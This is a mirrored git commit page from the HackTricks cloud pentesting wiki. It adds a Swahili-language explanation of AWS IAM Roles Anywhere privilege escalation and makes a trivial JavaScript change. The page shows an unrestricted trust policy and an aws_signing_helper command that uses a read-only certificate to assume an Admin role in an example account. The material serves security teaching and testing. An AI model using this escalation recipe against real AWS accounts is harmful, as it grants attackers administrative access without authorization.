gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-14 05:46:25 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/

Browse Source
This commit is contained in:
Translator
2025-06-24 14:00:32 +00:00
parent c0b2f40b7e
commit 3c5d281ffe
2 changed files with 43 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

42
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md Normal file
View File

@@ -0,0 +1,42 @@
# AWS - IAM Roles Anywhere Privesc
{{#include ../../../../banners/hacktricks-training.md}}
AWS IAM RolesAnywhere inaruhusu kazi zinazofanyika nje ya AWS kuchukua majukumu ya IAM kwa kutumia vyeti vya X.509. Lakini wakati sera za kuamini hazijapangwa vizuri, zinaweza kutumika vibaya kwa ajili ya kupandisha hadhi.
Sera hii haina vizuizi kuhusu ni vipi kiunganishi cha kuamini au sifa za cheti zinazoruhusiwa. Kama matokeo, cheti chochote kilichounganishwa na kiunganishi chochote cha kuamini katika akaunti kinaweza kutumika kuchukua jukumu hili.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "rolesanywhere.amazonaws.com"
},
"Action": [
"sts:AssumeRole",
"sts:SetSourceIdentity",
"sts:TagSession"
]
}
]
}
```
Ili kupata privesc, `aws_signing_helper` inahitajika kutoka https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html
Kisha kwa kutumia cheti halali, mshambuliaji anaweza kuhamasisha katika jukumu la juu la mamlaka.
```bash
aws_signing_helper credential-process \
--certificate readonly.pem \
--private-key readonly.key \
--trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \
--profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \
--role-arn arn:aws:iam::123456789012:role/Admin
```
### Marejeleo
- https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation/
{{#include ../../../../banners/hacktricks-training.md}}

2
theme/ai.js
View File

@@ -226,7 +226,7 @@
`threadId=${threadId}; Path=/; Secure; SameSite=Strict; Max-Age=7200`; `threadId=${threadId}; Path=/; Secure; SameSite=Strict; Max-Age=7200`;
} catch (e) { } catch (e) {
console.error("Error creating threadId:", e); console.error("Error creating threadId:", e);
alert("Failed to initialise the conversation. Please refresh."); console.log("Failed to initialise the conversation. Please refresh.");
throw e; throw e;
} }
} }